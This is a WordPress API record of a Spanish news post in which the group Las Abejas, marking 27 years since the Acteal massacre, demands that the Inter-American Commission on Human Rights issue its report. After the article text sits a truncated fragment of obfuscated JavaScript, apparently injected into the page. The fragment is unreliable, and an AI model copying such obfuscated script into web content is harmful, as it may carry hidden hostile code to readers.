{"id":19456,"date":"2024-12-24T03:15:23","date_gmt":"2024-12-24T03:15:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19456"},"modified":"2024-12-24T03:15:24","modified_gmt":"2024-12-24T03:15:24","slug":"exigen-justicia-a-27-anos-de-la-masacre-de-acteal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19456","title":{"rendered":"Exigen justicia a 27 a\u00f1os de la masacre de Acteal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241223-WA0034.jpg\" alt=\"\" class=\"wp-image-19457\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241223-WA0034.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241223-WA0034-300x200.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>23 de diciembre del 2024. San Crist\u00f3bal de Las Casas.- En el marco del 27\u00ba aniversario de la masacre de Acteal, integrantes de la organizaci\u00f3n Sociedad Civil Las Abejas demandaron a la Comisi\u00f3n Interamericana de Derechos Humanos (CIDH) que emita de manera inmediata el informe de fondo sobre el caso, pendiente desde hace dos a\u00f1os.<\/p>\n\n\n\n<p>Mediante un comunicado, la organizaci\u00f3n calific\u00f3 la demora de la CIDH como \u201cun tiempo no sensato\u201d y subray\u00f3 la urgencia de responsabilizar al Estado mexicano por la masacre ocurrida el 22 de diciembre de 1997, en la que 45 personas, incluidas mujeres, ni\u00f1os y ancianos, fueron asesinados mientras rezaban en la comunidad de Acteal, Chiapas.<\/p>\n\n\n\n<p>En el mismo comunicado, Las Abejas de Acteal tambi\u00e9n se refirieron a la reciente sentencia de la Corte Interamericana de Derechos Humanos sobre la desaparici\u00f3n forzada de Antonio Gonz\u00e1lez M\u00e9ndez. Seg\u00fan la organizaci\u00f3n, dicha resoluci\u00f3n confirma la existencia de una estrategia de guerra contrainsurgente implementada en el Plan de Campa\u00f1a Chiapas 94, que provoc\u00f3 m\u00faltiples violaciones a derechos humanos, incluidos desplazamientos y desapariciones forzadas en la regi\u00f3n Norte del estado.<\/p>\n\n\n\n<p>&#8220;As\u00ed como la familia del compa\u00f1ero Antonio Gonz\u00e1lez, nosotras y nosotros, los sobrevivientes de la masacre de Acteal, luchamos para que la muerte de nuestros familiares encuentre la justicia&#8221;, expresaron en su mensaje.<\/p>\n\n\n\n<p>La organizaci\u00f3n denunci\u00f3 que la impunidad en el caso de Acteal y otros cr\u00edmenes en Chiapas ha exacerbado la crisis de derechos humanos y la violencia en M\u00e9xico.<\/p>\n\n\n\n<p>Finalmente, reiteraron su compromiso con la memoria y la justicia: &#8220;No nos quedamos cortos, ni seamos conformistas en la b\u00fasqueda de la justicia. Seguiremos siendo mujeres y hombres cabales, persistentes, que no olvidan, no retroceden y siempre est\u00e1n decididos a denunciar y exigir la justicia verdadera&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 23 de diciembre del 2024. San Crist\u00f3bal de Las Casas.- En el marco del 27\u00ba aniversario de la masacre de Acteal, integrantes de la organizaci\u00f3n Sociedad Civil Las Abejas demandaron a la Comisi\u00f3n Interamericana de Derechos Humanos (CIDH) que emita de manera inmediata el informe de fondo sobre el caso, pendiente desde &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19458,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19456","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19456","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19456"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19456\/revisions"}],"predecessor-version":[{"id":19459,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19456\/revisions\/19459"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19458"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19456"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19456"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}